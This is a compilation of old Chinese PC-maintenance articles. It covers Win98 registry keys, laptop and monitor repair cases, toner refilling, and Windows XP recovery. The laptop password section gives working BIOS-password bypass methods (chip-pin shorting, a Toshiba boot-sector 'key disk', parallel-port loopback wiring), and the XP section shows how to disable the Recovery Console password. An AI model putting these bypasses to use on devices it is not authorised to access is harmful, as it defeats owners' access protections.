        在Windows文件夹中有system.dat和user.dat这样两个隐藏文件，其中保存了至关重要的注册表信息。我们可以通过运行regedit.exe来修改windows的设置，达到其他方法不能达到的效果，使Windows更如你意。本说明书的内容以Win98第一版为准，但多数也是适用于Win95、Win95osr2、Win98se甚至Win2000的。

    一、注册表根键说明

    hkey_classes_root 包含注册的所有OLE信息和文档类型，是从 hkey_local_machine\software\classes复制的。
    hkey_current_user 包含登录的用户配置信息，是从hkey_users\当前用户子树复制的。
    hkey_local_machine 包含本机的配置信息。其中config子树是显示器打印机信息； enum子树是即插即用设备信息；system子树是设备驱动程序和服务参数的控制集合；software子树是应用程序专用设置。
    hkey_users 所有登录用户信息。
hkey_current_config 包含常被用户改变的部分硬件软件配置，如字体设置、显示器类型、打印机设置等。是从hkey_local_machine\config复制的。
    hkey_dyn_data 包含现在计算机内存中保存的系统信息。

    二、注册表详细内容
    Hkey_local_machine\software\microsoft\windows\currentVersion\explorer\user shell folders 保存个人文件夹、收藏夹的路径
    Hkey_local_machine\system\currentControlSet\control\keyboard Layouts保存键盘使用的语言以及各种中文输入法
Hkey_users\.Default\software\microsoft\internet explorer\typeURLs保存IE浏览器地址栏中输入的URL地址列表信息。清除文档菜单时将被清空。
    Hkey_users\.Default\so..\mi..\wi..\currentVersion\ex..\menuOrder\startMenu 保留程序菜单排序信息
Hkey_users\.Default\so..\microsoft\windows\currentVersion\explorer\RunMRU 保存“开始 * 运行...“中运行的程序列表信息。清除文档菜单时将被清空。
    Hkey_users\.Default\so..\microsoft\windows\currentVersion\explorer\ecentDocs 保存最近使用的十五个文档的快捷方式(删除掉可解决文档名称重复的毛病)，清除文档菜单时将被清空。
    Hkey_local_machine\software\microsoft\windows\currentVersion\uninstall 保存已安装的Windows应用程序卸载信息。
hkey_users\.default\software\microsoft\windows\currentVersion\applets 保存Windows应用程序的纪录数据。
Hkey_local_machine\system\CurrentControlSet\services\class 保存控制面板-增添硬件设备-设备类型目录。
    Hkey_local_machine\system\CurrentControlSet\control\update 立即刷新设置。值为00设置为自动刷新，01设置为手工刷新[在资源管理器中按F5刷新]。
HKEY_CURRENT_USER\Control Panel\Desktop 新建串值名MenuShowDelay=0 可使“开始”菜单中子菜单的弹出速度提高。新建串值名MinAnimate，值为1启动动画效果开关窗口，值为0取消动画效果。
    Hkey_local_machine\software\microsoft\windows\currentVersion\run 保存由控制面板设定的计算机启动时运行程序的名称，其图标显示在任务条右边。[启动文件夹程序运行时图标也在任务条右边]
hkey_users\.default\software\microsoft\windows\currentVersion\run保存由用户设定的计算机启动时运行程序的名称，其图标显示在任务条右侧。
HKEY_CLASS_ROOT/Paint.Pricture/DefaultIcon 默认图片的图标。双击窗口右侧的字符串，在打开的对话框中删除原来的键值，输入%1。重新启动后，在“我的电脑”中打开Windows目录，选择“大图标“，然后你看到的Bmp文件的图标再也不是千篇一律的画板图标了，而是每个Bmp文件的略图。
    Hkey-local-machine\ software\ microsoft\ windows\ currentVersion\ Policies\ Ratings 保存IE4.0中文版“安全”*“分级审查”中设置的口令(数据加密)。
    Hkey-local-machine\ software\ microsoft\ windows\ currentVersion\ explorer\ desktop\nameSpace保存桌面中特殊的图标,如回收站、收件箱、MS Network等。

    三、怎样存取注册表信息
    可以通过VB5.0提供的两个语句和两个函数在程序中读写注册表。
    1、SaveSetting语句
    语法. SaveSettingappname,section,key,setting
    2、GetAllSettings函数
    语法. GetAllSettings(appname,section)
    3、GetSetting函数
    语法. GetSetting(appname,scetion,key[,default])
    4、DeleteSetting语句
    语法. DeleteSettingappname,section,[key]
    参数含义.
    appname. 字符串表达式，应用程序名
    section. 字符串表达式，小节名
    key. 字符串表达式，关键字名
    setting. 表达式，关键字设定值
    下面通过实例来说明它们的用法. 应用程序名为jld_app，小节名为startup，关键字为left。
    在注册表中建立应用程序的注册项.
    SaveSetting“jld_app”,“startup”,“left”,100
    从应用程序注册表项中读取所有关键字及其对应的值.
    Dimmysettings(10,10)AsVariant
    DimsettingindexAsInteger
    GetAllSettings“jld_app”,“startup”
    Forsettingindex=LBound(mysettings,1)ToUBound(mysettins,1)
    Debug.Printmysettings(settingindex,0);“=”;mysettings(settingindex,1)
    Nextsettingindex
    EndSub
    从应用程序注册表项中读取关键字“left“的设置.
    Debug.PrintGetSetting(“jld_app”，“startup”，“left”，“notok”)
    从WIN98注册表中删除小节“startup”
    DeleteSetting“jld_app”，“startup”
    四、注册表的备份
    Windows每次启动都会自动对注册表进行备份。放在windows\sysbckup里的rb00X.cab文件里，出注册表出现问题，在DOS下用extract /e展开，拷贝回去就可以了。


笔记本电脑电池引起的故障

《一键清理系统垃圾》

笔记本电脑电池引起的故障

    我经常给别人修理电脑，最近遇到了三起笔记本电脑无法开机、关机问题，它们都与电池有关。现将解决过程写出来，让日益增多的笔记本电脑用户能得到些启发。
        例一：一联想赛扬CPU笔记本电脑，故障现象是开机进入Win 98时，出现找不到系统文件的提示，也根本不能进入安全模式。检查并清除了病毒后，开机，故障依旧。重新安装系统时，出现SUXXX错误，无法继续安装，于是准备删除系统后重新安装。正在这时，系统不能开机了。仔细检查，发现电源灯不亮，且笔记本电脑上的所有指示灯也都不亮。检查外接电源后，没有发现什么问题，去掉外接电源，也不能使电脑指示灯亮。我不知道该怎么办了，怀疑电脑硬件有问题。突然，灵机一动，将笔记本电脑的电池取掉了，然后将外接电源接上，笔记本电脑的指示灯亮了，机器正常了。
        例二：一东芝486笔记本电脑，某天突然无法开机，也是将电池卸掉后，才使电脑正常工作的。
        例三：另一不知名的笔记本电脑，CPU是PⅡ级别的。朋友在凌晨2点把我从睡梦中叫醒，说她的笔记本电脑死机了，没有复位键，也不能关机。我告诉她将笔记本电脑外接电源断开并将它的电池取掉。可是，她怎么也不能取下电池。后来，经别人帮助，她才将电池卸下来。之后，再将它装回去就解决问题了。
        以上数例表明，笔记本电脑的电池是很容易引起无法开机故障的。当你的笔记本电脑无法开机，所有指示灯都不亮时，可以尝试将它的电池取下，看看是否可以通过外接电源来开机。试试看，多数都能解决问题的。


笔记本电脑维修四例

《一键清理系统垃圾》

笔记本电脑维修四例

    笔记本电脑由于其结构的特殊性，决定了其维修的复杂性。但笔记本电脑终究是电脑的一种，它的维修原理与普通台式机是基本相同的。如果你是一位笔记本电脑用户，而且对它的维修方面的知识感兴趣，那么你可以参看本文，这里列举了四例解决笔记本电脑故障的分析处理过程，也许会使你得到一些帮助。
    故障现象一：东芝2520CDT笔记本电脑，配置为：K6－2 300、64M、4.0G、12.1英寸TFT、24速CD。开机后黑屏，电源指示亮，硬盘有工作时的响声，光驱上的指示灯常亮。
    分析处理：开始怀疑是感染CIH病毒造成的，只好打开笔记本电脑，拆下BIOS芯片，重新写入BIOS程序，完成后开机，故障依旧。看来不是开机程序被CIH病毒改写造成的，这说明极有可能是硬件故障。那么能够造成开机无显示这样严重问题的硬件主要有三种：CPU、主板和液晶屏。采取“替换试探法”，依次用好的硬件来代替测试，发现故障在于CPU损坏。换上一颗新的同型号CPU后，系统开机恢复正常，硬盘数据完好无损，故障解决。
    故障现象二：东芝4030CDT笔记本电脑，配置为：C－300、64M、4.0G、13.3英寸TFT、24速CD。推动电源按钮，有时能正常开机，关机后短时间内可以再开机，时间一长（比如半天时间）就无法开机，此时供电指示灯亮，系统没有反应，必须使用冷启动Reset按钮，才能引导系统，这种情况在交流电供电和电池供电下都会遇到。
    分析处理：按照“由软到硬”的检查法，首先从有关电源管理方面的软件设置入手。在Win98的“控制面板”中检查“电源管理”各项设置，没有发现错误；再检查“控制面板”→“系统”→“设备管理器”→“系统设备”下的“高级电源管理支持”，其驱动程序也安装正确。排除了Win98中有关电源方面设置错误的因素后，在开机时按“ESC”键，再按“F1”键进入系统BIOS，查看电源启动方面的设置，将“Power－up Mode”一项由“Resume”改为“Boot”，屏蔽掉“Panel Power On/off”。将“Auto Power On”一项设为“Disabled”，再开机故障依旧。由此断定是硬件故障，可能是电源模块内部接触不良，导致电压输出时有时无。果不出所料，更换新的电源块后，系统开机一切正常，故障彻底排除。
    故障现象三：东芝2520CDT笔记本电脑，在Win98下用《超级解霸5.5》播放VCD时，图像色彩不正常，颜色偏黄。
    分析处理：开始认为是《超级解霸5.5》的问题，在《超级解霸》的控制界面中，手动调节色差，无论怎样匹配，色彩显示都是不正常，卸载后重装《超级解霸》，问题依旧，说明与《超级解霸》无关。用“画图”随意打开一幅色彩较丰富的图片文件，观察整个画面颜色也是偏黄，由此怀疑是显示卡驱动程序的问题。查看“控制面板”→“系统”→“设备管理器”→“显示适配器”下的显卡驱动程序，为Toshiba公司的S3 VIRGE－MX（260）。于是专门上网到“联想东芝网上俱乐部”（http:∥www.ltclub.legend.com.cn）下载了2520CDT笔记本电脑在Win98下的显卡驱动程序，这是一个名为“s254vid8”的压缩软件包，解压后制作成驱动程序盘。删除原有的驱动程序，换上刚下载的显示驱动程序后，检查图像色彩，颜色还是偏黄。至此，软件方面的检查结束，进入硬件检查环节，决定用“替换法”测试显示卡和液晶显示屏的好坏。在笔记本电脑上外接一工作正常的台式机显示器，然后在“显示”属性中设置显示输出到LCD/CRT，按“F4”键切换到液晶屏和显示器同时工作的状态下对比两者，发现后者在播放VCD和显示图片时色彩均正常，由此断定是液晶屏有问题。更换一块新的液晶屏后，显示色彩恢复正常，故障排除。
    故障现象四：康柏1500C笔记本电脑，配置为：C－300，32M，4.0G，12.1英寸TFT，24xCD；开机后不能引导Win98，屏幕上光标闪烁，没有任何显示信息，硬盘指示灯常亮，系统进入死机状态。
    分析处理：从硬盘不能引导，可能是硬盘上的系统文件被病毒破坏。插入一张Win98启动盘从软驱启动，读盘几秒后死机，屏幕上只有光标闪烁，硬盘指示灯亮；换用DOS6.22软盘启动，到显示“Starting MS－DOS…”后同前次一样死机；最后插入Win98光盘尝试从光驱启动，结果还是死机。三种启动方式均告失败，且故障现象大同小异，都是发生在启动时读取硬盘信息出错，怀疑是CMOS中的硬盘参数设置有误。重启电脑在显示开机画面时，发现按“F10”键无法进入CMOS设置程序。因为康柏系列计算机的有关系统配置参数是存放在硬盘上的非DOS专用分区中，不能进入BIOS，说明分区也被破坏，需要重建该分区。于是上网到康柏中国服务网（http:∥www.compaq.com.cn）下载了1500C笔记本电脑的诊断软件包，制作成一张康柏系统诊断盘，用它来引导还是不行，故障依旧。由于硬盘的分区无法恢复，系统配置信息不能加载，加之硬盘的引导记录块和分区表被破坏，在用系统诊断盘启动时，读取硬盘信息错误，无法建立磁盘基数表和参数表导致死机，看来这块硬盘存在物理损坏很难修复了。在更换一块好的硬盘后，用系统诊断盘重建分区，再对剩余空间进行DOS分区，格式化后重装Win98，这台笔记本电脑终于又可以使用了。


笔记本密码破解

《一键清理系统垃圾》

笔记本密码破解

对于笔记本电脑，最好不要轻易的设置密码，因为笔记本电脑的开机密码并不是象PC机那样存放在CMOS电路中可以通过放电清除的，目前较新的笔记本都是将密码保存在主板的几块逻辑电路中，我们个人是无法破解的（此系列电脑，密码可加至三层，每一层都针对不同的设备加密，如果设置的密码丢失的话，呵呵......电脑可就是摆设了），要破解的话得换，可能得花不少钱(至少好几百)。

但是对于型号较老的笔记本电脑，你可以试试下面的方法，也许可以解除笔记本的开机密码：一是改变机器的硬件配置，比如把硬盘取下来，再重新启动有可能会自动进入Setup程序，并清除开机密码。二是可以试试在主板上找一个芯片，这个芯片俗称818芯片，一般是“MC146818"有24个引脚，短接第12脚和第24脚1秒钟，或者找一个标有” MC14069"的芯片，把其第14脚对地短接一下，也许可以达到清除密码的目的。

    对于东芝笔记本电脑如果你忘记了你的口令，可以使用口令服务软盘来解决(口令服务软盘在你每次设置或修改开机口令时生成，请妥善保存)。具体步骤如下：在驱动器中插入口令服务软盘。按下Enter,出现下列消息：　 Set Pass Again?(Y/N) 按Y运行TSETUP程序，设置新口令。按N重新启动电脑。

    注意：口令服务软盘必须被插入驱动器中，否则显示将返回到Password=。如果已经在驱动器中插入了软盘，该消息仍然出现，口令服务软盘可能有问题。此外在使用口令服务软盘时要注意以下两个问题：如果BIOS引导优先级设置为硬盘或光驱，按复位按钮，保持F键按下以确保从软盘驱动器引导。如果电脑处在恢复方式，打开电源时口令服务软盘将不起作用。这时，也请先按复位按钮。

    对于型号较老的东芝笔记本电脑，其BIOS口令保护存在一个“后门”。你可以试试下面介绍的办法，也许能绕过东芝笔记本BIOS口令限制，而无需输入任何密码认证。准备好一张格式化好的空软盘，另外一台计算机，一种二进制编辑软件(比如Norton DiskEdit或者UtralEdit 32等)。具体的步骤如下：

  1.　启动另一台电脑，打开二进制编辑器，将软盘插入驱动器，修改软盘第一扇区的前5个字节，使其变成: 4B 45 59 00 00，注意引导扇区是第0扇区，不要改错了。然后保存修改，你现在就有了一张钥匙盘了。将这张软盘插入笔记本电脑的软驱中，按reset键重启动，当提示你输入口令时，直接按回车，系统提示你是否要再次设置口令。按"Y"，回车。然后你就看到了BIOS的设置界面，可以重新设定一个新口令了。

2.笔记本电脑是TOSHIBA，可以方便的借助电脑本身的打印口来清除密码。
联接为：1脚接5脚和10脚，2脚接11脚，3接17，其它类推。
1- 5-10
2 -11
3 -17
4 -12
6 -16
7- 13
8- 14
9 -15
此表为电脑主板上接口。外接的接口与此相反，请注意。
红点为笔记本电脑上并口1脚

    如果上面的介绍的方法都不起作用，就只有送笔记本电脑专业维修点用特殊方法处理，倘若过了保修期，在价格上你只有任人宰割了。因此一般没有特殊原因，笔记本电脑还是不要随意设置开机口令。为保证数据安全，建议大家装WIN2000/NT或WINXP操作系统，并使用NTFS格式分区，这样其实比单纯设置开机口令，更能保证系统安装。现在有些笔记本电脑还提供了指纹开机识别系统等安装措施，取代传统的BIOS密码保护。


变废为宝-一次性硒鼓简单再生法

《一键清理系统垃圾》

变废为宝-一次性硒鼓简单再生法

    激光打印机打印质量高，效果好，深受广大计算机用户喜欢，但它的高运行成本让人头痛，而且用完的硒鼓会对环境造成严重污染，废旧硒鼓已被许多国家列为重要的污染物品。如果让这些一次性的硒鼓再用几次，可以节约许多资金，而且还可以保护环境。其实，复活硒鼓也是非常容易，不需要高超的技术和设备，只要您肯动手，一定会立马成功（初次工作20分钟搞定）。

    我以HP Laserjet 6L激光打印机硒鼓为例，介绍具体操作过程。

    工 具

    50ml塑料注射器一只（不要针，可以是使用过的）；

    5mm钻头或锥子一件；

    小刀、小刷子各一把。

    材 料

    墨粉HP 5L/6L激光打印机墨粉 一瓶；

    不干胶标签若干；

    旧报纸若干张。

    备齐这些东西后，把报纸铺在桌上防止墨粉污染桌子。

    步骤一：

    在硒鼓的墨粉仓上打孔：识别墨粉仓非常容易，它上面有两个方向标志和三个图案；把硒鼓方向标志的方向朝向自己，并在其一侧（图案与方向标志的中间）打一个5mm的孔，微大于注射器头（平时是插针头用的）。在打孔时特别要注意的是不要让塑料碎屑掉入到墨粉仓内，避免影响打印质量。如果孔的周围不平整时，可以用小刀修平，然后用一张报纸盖住硒鼓，防止散落的墨粉污染整个硒鼓（像医生做手术时在病人开刀处要放一块有一个开口的布一样）。

    步骤二：

    灌墨粉：打开墨粉瓶塑料盖，保留密封片，在密封片上开一个8mm左右小口，不要撕掉整个密封片，没有密封片难以控制墨粉的倒出量。然后拔掉注射器的推柱，把注射器管插在小孔上，然后往注射器管中慢慢倒入墨粉，如果墨粉瓶中的墨粉倒不出时可以挤压墨粉瓶。先让注射器管内的墨粉自行流入到墨粉仓里，同时观察注射器管内的墨粉流动情况，并且用刷子把轻轻打击注射器管，当墨粉不再向墨粉仓内流动，并且留在注射器内的墨粉已经占整个注射器管的80%时，插入注射器的推柱，轻轻往里推，同时观察注射器内的墨粉流入墨粉仓内的情况，当发现墨粉不再运动或向里推有压力时，要向外拉一些。这样推推拉拉反复进行，直到注射器管墨粉全部进入到墨粉仓内。注意在往里推的时候不要推得太快，避免压实墨粉，墨粉被压实会妨碍墨粉进入。一旦墨粉压实，先要往外拉一下推柱减小墨粉仓与注射器的压力（这一步千万不能省），拔出注射器，把注射器朝上，用刷子把轻击注射器，让墨粉松散后再插入硒鼓的小孔进行灌粉。

    灌完一针管的墨粉后，要提起硒鼓有孔的一端轻摇几下，让进入墨粉仓的墨粉移往另一端，给下次灌墨留出空间，重复上面的工作，直到墨粉瓶中的墨粉全部灌入硒鼓内。

    步骤三：

    清洁、封口：去掉硒鼓上盖的报纸，用刷子清洁小孔周围残留的墨粉，在小孔上粘上不干胶标签纸密封小孔，在标签上写明第几次灌注。这样完成整个硒鼓灌注工作，就可以装上打印机使用了。

    今后，墨粉用完后只要撕掉标签后就可以再次加粉，一般可加灌3～4次。

    有几个方面要注意：

    一、激光打印机的墨粉是非常细小的，容易在空气飘浮，在灌注墨粉时千万不要有风；

    二、操作人员最好戴口罩，防止吸入空气飘浮的墨粉；

    三、再次灌注前，先打印一张纸，观察一下打印效果，看看整张纸浓淡是否均匀，如果有明细的浓淡，摇晃硒鼓后再次进行打印。如果这次浓淡趋于均匀，说明打印的浓淡确实因墨粉使用将尽造成的，而不是感光棍的损坏；

    四、已经过3次以上灌注的硒鼓，要先试灌一注射器量的墨粉，装上激光打印机，试打一下，确认灌注后有一定的效果。否则可以确认硒鼓是彻底报废了。这样避免浪费更多的墨粉；

    五、废硒鼓不要乱扔，集中处理。

东东点评：此方法简单易用，既不会污染环境又保护了用户的投资。不过加粉的次数一多， 废粉仓里面的废粉处理就成了问题。如果大家勤于动手的话，可不用在粉仓上钻孔。将硒鼓两边的插销拨掉，就可以把硒鼓拆开了。 然后加粉、倒掉废粉，这样子处理比较完美一点。只是会搞得“两手黑黑”的：）


不用重装轻松解决Windows系统棘手问题

《一键清理系统垃圾》

不用重装轻松解决Windows系统棘手问题

    Windows XP是目前大家普遍使用的操作系统，其稳定性和易用性不容置疑。但是它也像人一样会闹个头疼脑热，出现点“感冒”症状，严重时得了重感冒一病不起也是不鲜见的事，这时很多人就会想到重装系统，但重装系统有一个最大的麻烦，就是需要之前备份，否则恢复到以前的使用习惯很难，一旦遇到一系统启动不起来，想备份也没了机会，这时你该
怎么办呢?笔者在这里给你一个比较好的答案。

    一、Windows环境下

    如果你的计算机还可以进入Windows环境中，那么恭喜你，这种情况下即使系统出现了问题，仍然不会是大问题。在这种情况通常会出现以下几种方法:

    1.从安装光盘解压缺少的一些重要文件

    如果WindowsXP已经进入，但却发现少了某些文件，其中最常见的是Rundll32.exe的丢失。下面就以恢复这个文件为例来说明:单击“开始”/“运行”，在该窗口中输入expand x:\i386\Rundll32..ex_ c:\windows\system32\Rundll32.exe(x代表光驱盘符，rundll.ex_代表需要解压的文件，c:\windows\system32指的是目标文件夹，这些都要根据具体情况来定),即可将丢失的文件恢复至系统。当然也可以直接从其他正常运行的机器复制该文件至本机的相应目录下。

    另外，对于丢失的dll链接文件，还可以通过Regsvr32这个程序文件来恢复，恢复的时候需要在运行窗口中输入Regsvr32 a.dll(a.dll代表丢失的链接文件)，回车后即会在注册表中注册该文件，然后在弹出的对话框中点“确定”即可。

    2.DLL文件的恢复

    DLL文件的名称为动态链接库文件，一般存在于Windows\system32文件夹下，该文件丢失或者被替换，一般也可进入Windows，但是执行应用程序时往往会出现系统报错。这种错误通常可以通过Sfc(系统文件检查器)。sfc是一个命令行程序，必须在WindowsXP的“命令提示符”窗口下才能运行，为了实现多种功能，sfc提供了多个参数，使用格式为:sfc/参数1 /参数2……，各个参数之间要用一个空格隔开。下面介绍一下其几个主要的参数，以方便大家使用:

    /scannow:用来扫描所有受保护的系统文件，也是应用比较广的一个参数，它主要是通过正确的系统文件代替错误的系统文件。该参数还可以将最新版本的受保护系统文件放入DLLCache文件夹，而且在操作过程中可能需要WindowsXP的安装光盘，以及其补丁文件，如果你没有该光盘，而是在硬盘上备份了安装文件，可以通过修改注册表来完成该项功能。在运行窗口键入Regedit命令进入注册表编辑器窗口，找到HKey_Local_Machine\software\Microsoft\Windows\CurrentVersion\setup项，在右侧的窗口中修改Installation Sources、ServicePacksourcePath和SoutcePath三个键值为硬盘上的系统安装程序路径，这样在修复时就不用再插入WindowsXP安装光盘了。

    /scanonce:下次启动时执行受保护系统文件的扫描，也需要读取安装光盘和补丁文件。这个命令常常在执行/scannow命令出现错误提示时才使用。

    /scanboot:每次启动系统时都扫描所受保护的系统文件，这可能大大降低启动速度，一般不用，使用情况同/scanonce参数。

    /purgecache:用来清除文件缓存(该文件默认情况下是在%systemroot%\system32\dllcache下)并立即扫描所有受保护的系统文件，常在其后还要加上“/cachesize=x”这个参数，这个参数是用来设置文件缓存大小的，以MB为单位，该参数如果设置较小可以节省硬盘空间，如果设置大一些可以保护系统文件，则可能尽可能地恢复更多的系统文件。

    一般情况下执行sfc/scannow就可以对系统文件进行恢复了，时间一般在10分钟左右。

    3.系统还原显身手

    如果用sfc/scannow还是出错的话，则可能想到用系统还原功能来恢复系统。特别是在增删某些软件后出现了系统故障的时候，这种方法就显得尤为方便。

    依次单击“开始→所有程序→附件→系统工具→系统还原”，运行“系统还原”命令，打开“系统还原向导”，选择“恢复我的计算机到一个较早的时间”，点击“下一步”，选择好日期后再跟着向导还原即可。

    上文所讲系统还原功能是Windows XP中操作的，如果不能进入Windows XP系统，可以通过如下方法解决:

    ⑴安全模式运行系统还原

    如果Windows XP能进入安全模式的话，则可在安全模式下进行系统恢复，步骤同“恢复还原点”。

    ⑵DOS模式进行系统还原

    如果系统无法进入安全模式，则在启动时按F8，选“Safe Mode with Command Prompt”，用管理员身份登录，进入%systemroot%\windows\system32\restore目录，找到rstrui文件，直接运行rstrui文件，按照提示操作即可。

    ⑶在丢失还原点的情况下进行系统还原

    在Windows XP预设了System Volume Information文件夹，通常是隐藏的，它保存了系统还原的备份信息。打开查看“显示所有文件和文件夹”属性，取消“隐藏受保护的系统文件”前有选择，会在每个盘中看到“System Volume Information”文件夹。利用这个文件夹可以进行数据恢复。鼠标右击“我的电脑”，选择“属性”/“系统还原”，取消“在所有驱动器上关闭系统还原”复选框，单击“应用”按钮。这样做是为了重建一个还原点。再打开“系统还原”命令，就可以找到丢失的还原点了。

    上面的叙述是针对FAT32分区，如果系统分区为NTFS，那么在启动System Volume Information文件夹时会遇到一点麻烦。因为你可能并没有被加入到System Volume Information安全属性中，访问不到该文件。鼠标右击该文件夹，在弹出的菜单中选择“属性”，打开System Volume Information属性对话框，选中“安全”选项卡，单击“添加”按钮，打开“选择用户或组”窗口，点击该窗口右下角的“高级”按钮，然后单击“立即查找”按钮，这时会列出计算机上所有的用户和组，选中自己当前的账户或账户所在组的名称后“确定”。这样选中的账户被添加到System Volume Information安全属性中，就可以访问该文件夹了。

    二、在DOS环境下

    如果电脑已经进入不了WindowsXP，那么也不用太着急重装系统，因为这时还是有些方法的。

    1.安全模式

    在WindowsXP启动时按F8键，选择“安全模式”，如果能启动成功，则退出后再正常启动。

    2.最后一次正确的配置

    其基本操作同安全模式，但需要说明的是选择该项回车前要确保关闭了键盘上的NumLock指示灯。

    3.故障恢复台

    ⑴控制台的安装

    ①控制台硬盘安装

    插入WindowsXP安装光盘，单击“开始”/“运行”，输入\i386\winnt32.exe/cmdcons命令后回车，在出现的对话框中显示了“故障恢复控制台”安装选项，单击“是”后确认，重新启动计算机即会在启动菜单中看到“Microsoft Windows Recovery Console”菜单，选中后即可进入“故障恢复控制台”。

    ②控制台光盘安装

    首先在BIOS中将启动顺序设置为CD-ROM，再在光驱中插入WindowsXP安装光盘启动系统，在屏幕显示“欢迎使用安装程序”时，按R启动故障恢复控制台。接着系统会要求输入管理员密码，输入后即可进入故障恢复台。若安装了多系统，则需要通过光标键来选择故障恢复台项，对于使用了SCSI或RAID的硬盘，则在其启动时要按F6键。若要担心忘记管理员密码，可在WindowsXP正常启动时，运行Gpedit.msc进入策略编辑器，再依次选择“本地计算机策略”/“计算机配置”/Windows设置/“安全设置”/“本地策略”/“安全选项”，在右侧的窗口的双击“故障恢复控制台:允许自动系统管理级登录”项，鼠标右击，选择“启动”，单击“确定”按钮后保存设置，进入故障恢复控制台就不用输入密码了。

    ⑵“故障恢复控制台”应用

    ①修复受损的多启动菜单

    如果多操作系统菜单因为某种原因丢失，则可以进入“故障恢复控制台”，输入Bootcfg/scan命令，会自动扫描所安装的操作系统并显示出来，完成后再输入Bootcfg/rebuild命令，出现提示后按Y键，在“输入加载识别符”提示后输入丢失的启动菜单项，在“输入OS加载选项”后输入fastdetect后回车，即可找到多系统菜单。另外输入Bootcfg/add命令也可以向启动菜单中添加菜单项，使用方法基本同上。

    ②修复系统引导区

    当系统引导区因为某种原因造成损坏而不能启动时，可以进入故障恢复控制台，在命令行下输入Fixboot可以修复引导区。

    ③恢复系统重要文件

    系统中有一些重要的文件直接关系着是否能启动成功，如Ntldr这个文件丢失，系统就启动不起来，这时可以进入控制台，键入命令行copy x:\i386\ntldr*.* c:\后回车即可，重新启动后会发现能够正常进入WindowsXP了。如果丢失的是一些压缩文件，还可以在控制台输入expand x:\i386\a.ex_ c:\windows\(x代表光驱盘符，a.ex_代表需要解压的文件，c:\windows指的是目标文件夹，这些都要根据具体情况来定),即可将丢失的文件恢复至系统。

    ④启用或禁用某些服务或驱动程序

    这一功能主要应用于由于安装某些新的程序造成系统无法启动的情况，我们可能通过在故障恢复控制台中去掉该项服务或程序以达到系统起死回生的目的。具体操作如下:

    进入控制台，输入Listsvc命令后回车，在屏幕上会出现当前系统中已有的所有服务和驱动程序以及其状态说明。找到需要禁用的可疑服务或驱动程序，输入命令 disable 需要禁用的程序或服务，回车后屏幕上会显示出该服务以前的状态和完成后的状态;如果想雇用某个程序或服务，则需要键入Enable 需要禁用的程序或服务，回车后即可。


长城C-1475G数控彩显的维修

《一键清理系统垃圾》

长城C-1475G数控彩显的维修

    这是一台长城14英寸数控彩色显示器，其故障现象为：屏幕上方约5cm宽的部分突然出现不均匀的扫描线，图像上部稍被压缩，其他部分显示正常，基本不影响使用。
    顺着场偏转线圈向回查，发现电阻R731和二极管D601已被烧焦，型号规格无法辨认。测得电阻约1KΩ，二极管已被击穿。换上一只1/8W 1KΩ电阻和一只1N4148二极管，开机，故障依旧。查看线路板，这两个元件串联起来，一端接行输出变压器，另一端给一个9脚单列直插的集成电路块IC601（型号为TDA4866）供电，这个集成电路块的第6脚正好接场偏转线圈。初步估计是这个集成电路块内部电路损坏，从而引起供电电流过大而烧毁电阻与二极管。维修中得到本省长城特约维修部支持，购得该集成电路块及二极管、电阻三只并取得复印的线路图一份。
    查看线路图与本机有较大差距，但从图上看出TDA4866的供电电压为51V！取下该集成电路块和新集成电路块，对照测试，发现各脚电阻无明显差别，估计集成电路块未损坏。新集成电路块换上后果然故障依旧。测量第7脚，供电端电压仅有15V！立即将R731焊开，另接一只1kΩ电位器，串一只20Ω保护电阻，开机，边调节电位器，边测电压，看到屏幕显示图像逐渐好转，直到完全正常时，第7脚电压为32V。关机，焊开电位器，测阻值约77Ω，换上一只75Ω 1/8W电阻，开机，完全恢复正常，几分钟后集成电路块和电阻也未见明显发热。
    故障原因：由于TDA4866的第6脚外接了多股软线（输出至场偏转线圈），由于伸出过长，并拐了个弯，碰到第5脚旁的线路板上（接地端），使得输出信号短路（偏转线圈上有几百伏的高压、高频脉冲信号），集成电路块过载，才会烧坏供电电路。同时，使得该集成电路块得不到正常的工作电压而造成本故障。将线头剪短，彻底解决问题。目前该机已正常运行一个多月，未再出现任何问题。


常见Windows故障全面排除方案（二）

《一键清理系统垃圾》

常见Windows故障全面排除方案（二）

故障十二、压缩盘丢失 故障现象:
    利用Windows 9X提供的磁盘压缩功能对磁盘进行适当的压缩，可以达到为磁盘增容的目的。但是有一次进入系统后发现压缩盘找不到了，无论是从“资源管理器”还是从“我的电脑”或DOS命令行中都不能发现压缩盘。

故障分析:
    由于计算机是私人所有，故排除是人为删除了保存在压缩盘宿主盘上的压缩卷文件的可能性，根据自己的体会，怀疑是记录压缩盘的系统资料被误删所致，确定这一点后，只须手工恢复这些压缩资料即可恢复压缩盘。

解决方法:
    单击“开始/程序/附件/系统工具/磁盘空间管理”，启动Windows 9X的磁盘空间管理程序，从“这台计算机的驱动器”列表框中选择压缩盘的宿主盘（如用户在D盘中压缩生成了一个新的压缩盘E，那么D盘就是压缩盘E的宿主盘），然后执行“高级”菜单的“装配”命令（如图5），系统就会自动将D盘中原有的压缩卷文件重新转换为压缩盘，从而恢复丢失的压缩盘。不过，如果宿主盘中的压缩卷文件也被删除了，那就无可救药了。

故障十三、安装Windows 9X后，发现系统自带的游戏没有了 故障现象:
    重新安装Windows 9X后，发现系统自带的“空当接龙”、“纸牌”、“扫雷”等游戏找不到了。

故障分析:
    Windows 9X非常庞大，它包括许多不同的应用软件，为减少磁盘的负担，系统在默认情况下只安装其中的部分程序，“空当接龙”、“纸牌”等游戏是系统默认的不予安装的组件之一，因此按Windows 9X的默认安装方式，就找不到它们。

解决方法:
    对于这些游戏（包括在默认情况下没有安装的其他任何Windows 9X组件，如公文包），我们用“添加程序”的办法将它们加入到系统中。
步骤为:双击“控制面板”中的“添加/删除程序”选项，在弹出的“添加/删除程序”对话框中选择“Windows 安装程序”选项卡，此时系统就会在列表框中将所有的Windows组件显示出来（如图6），我们从中选择须要安装的组件“附件”，然后单击下面的“详细资料”按钮，进入“附件”的组件列表框，从中选择“游戏”组件,点击“确定”按钮，然后插入Windows 9X安装光盘并单击“确定”按钮，系统就会自动添加这些游戏组件。

故障十四、Windows 98的快速启动工具栏不见了 故障现象:
    Windows 98提供了一个由“查看频道”、“Internet explorer”、“Outlook express”和“显示桌面”等图标按钮组成的快速启动工具栏，我们可利用它快速启动相关的应用程序。可有一天进入系统后，发现该快速启动工具条不见了。

故障分析:
    该故障其实是用户无意中关闭了Windows 98的快速启动工具栏造成的，我们只须重新将其打开即可。另外，用户将快速启动工具栏拖到桌面上后也会造成快速启动工具栏“失踪”。

解决方法:
